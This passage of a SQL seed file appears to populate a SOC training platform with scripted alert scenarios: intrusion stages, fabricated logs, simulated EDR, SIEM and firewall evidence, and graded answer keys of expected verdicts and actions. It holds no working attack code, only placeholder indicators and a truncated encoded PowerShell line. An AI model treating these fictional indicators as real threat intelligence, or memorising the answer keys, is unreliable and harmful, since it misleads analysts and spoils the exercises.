samples.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.174Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_type\\\":\\\"registry_modification\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"modified_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousScript\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\evil_script.vbs\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"action\\\":\\\"added\\\",\\\"indicator\\\":\\\"persistence_attempt\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1510, 'Credential Dumping Activity Detected', 'high', 'Active Directory Logs', 'Anomalous credential harvesting activities detected from an internal host indicating potential lateral movement by the IceFog APT group. The attacker is utilizing compromised credentials to access additional systems within the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:21Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.5\",\"username\":\"john.doe\",\"domain\":\"corp.local\",\"process_name\":\"lsass.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\",\"activity\":\"Suspicious credential access attempt\",\"status\":\"Failed logon\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal host initiating suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1511, 'Data Exfiltration Alert', 'high', 'Network Traffic Analysis', 'In the final stage, IceFog initiates data exfiltration, targeting sensitive defense documents and transferring them to external servers under their control.', 'Data Theft', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:54Z\",\"src_ip\":\"10.0.1.25\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_defense_docs.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration_attempt\",\"status\":\"success\"}', '2026-03-15 19:09:15', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used to initiate connection.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known external server associated with IceFog APT.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_defense_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive defense-related documents.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised to perform data 
exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
--
-- Seed rows 1512-1516: scripted SOC training scenarios (one intrusion chain:
-- initial access -> execution -> persistence -> lateral movement -> exfiltration),
-- not production alert data. `raw_log`, `playbook_solution` and `simulation_data`
-- each hold a JSON document serialized into a single-quoted string literal, so
-- the escaping is nested: `\"` is one double quote in the stored JSON, `\\\\` is
-- one backslash in the decoded Windows path, and the SIEM `raw` field embeds the
-- JSON a second time (hence `\\\"` and runs of eight backslashes).
-- Indicator values are deliberate placeholders: 203.0.113.0/24 is the RFC 5737
-- TEST-NET-3 documentation range, d41d8cd98f00b204e9800998ecf8427e is the MD5 of
-- the empty string and e3b0c442...b855 is the SHA-256 of the empty string. Do not
-- feed them into blocklists or threat-intel feeds. NOTE(review): 185.143.223.45 in
-- row 1515 is NOT in a reserved range -- confirm it is intended as fiction.
-- `playbook_solution.expected_verdict` / `expected_actions` presumably form the
-- graded answer key, while `recommended_actions` is the full menu shown to the
-- analyst -- verify against the grading code. Row 1514 labels a scheduled-task
-- persistence scenario with T1547.001 (Registry Run Keys / Startup Folder); the
-- raw_log and simulation_data of row 1513 also disagree on host and remote IP.
-- Both look like fixture inconsistencies worth a content review.
--
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1512, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Anomalous traffic from an external IP address has been detected entering the Hacking Team network, indicating a potential unauthorized access attempt. The traffic pattern suggests initial access efforts to compromise the network perimeter.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T02:35:27Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"TCP\",\"destination_port\":3389,\"alert_signature\":\"Suspicious RDP Traffic\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"payload.exe\"}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal server used for RDP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in recent attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Executable file used to deploy malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1513, 'Execution of Malicious Payload', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, the attacker executes a malicious payload designed to exploit zero-day vulnerabilities within the network. The payload is identified to be associated with known APT tactics.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:00Z\",\"event_id\":\"EDR-2023-0912\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.2.3\",\"user\":\"jdoe\",\"filename\":\"malicious_payload.exe\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_type\":\"execution\",\"process_command_line\":\"C:\\\\malicious_payload.exe --exploit\",\"severity\":\"high\",\"indicators\":{\"ip\":\"203.0.113.45\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"jdoe\"}}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious payload used by APT.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Regular user account within the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1514, 'Establishing Persistent Access', 'high', 'System Logs', 'The attacker has successfully established persistence on the compromised system by installing a backdoor and creating a scheduled task. This allows them to maintain access despite security controls.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.25\",\"destination_ip\":\"10.0.0.45\",\"username\":\"admin_user\",\"process_name\":\"backdoor.exe\",\"process_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"scheduled_task\":\"persistent_task\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\backdoor.exe\",\"event_description\":\"Scheduled Task Created for Persistence\"}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Filename used by malware to maintain persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Privileged account used to schedule the 
task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.271Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:47Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.25\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"backdoor.exe\\\",\\\"process_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"scheduled_task\\\":\\\"persistent_task\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"event_description\\\":\\\"Scheduled Task Created for Persistence\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1515, 'Lateral Movement Across Networks', 'high', 'Internal Network Monitoring', 'Using established persistence, the attacker moves laterally through the network, accessing sensitive data and systems within the Hacking Team infrastructure.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"LM-20231012-003\",\"source_ip\":\"10.1.2.15\",\"destination_ip\":\"10.1.3.45\",\"malicious_ip\":\"185.143.223.45\",\"username\":\"j.doe\",\"file_hash\":\"d9f8eea7be5c3c1d4f1057a3b8cabf3c\",\"filename\":\"malicious_payload.exe\",\"action\":\"File Transfer\",\"protocol\":\"SMB\",\"network_context\":{\"internal_network\":\"Hacking Team\",\"external_network\":\"Internet\"}}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.143.223.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d9f8eea7be5c3c1d4f1057a3b8cabf3c\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash of known malicious payload used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Executable used for lateral 
movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal HR records\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1516, 'Data Exfiltration Detected', 'critical', 'Data Loss Prevention (DLP) System', 'The final stage of the attack involves exfiltrating critical data, including zero-day vulnerabilities and customer lists, posing a significant risk to the surveillance industry.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:58Z\",\"alert_id\":\"DL-2023-EXFIL-0005\",\"detected_action\":\"Data Exfiltration\",\"source_ip\":\"192.168.45.12\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filehash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"customer_list_secret.xlsx\",\"protocol\":\"HTTPS\",\"exfiltration_size\":\"2.5GB\",\"malware_associated\":false,\"internal_network\":true}', '2026-03-15 19:09:29', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP has been associated with multiple exfiltration 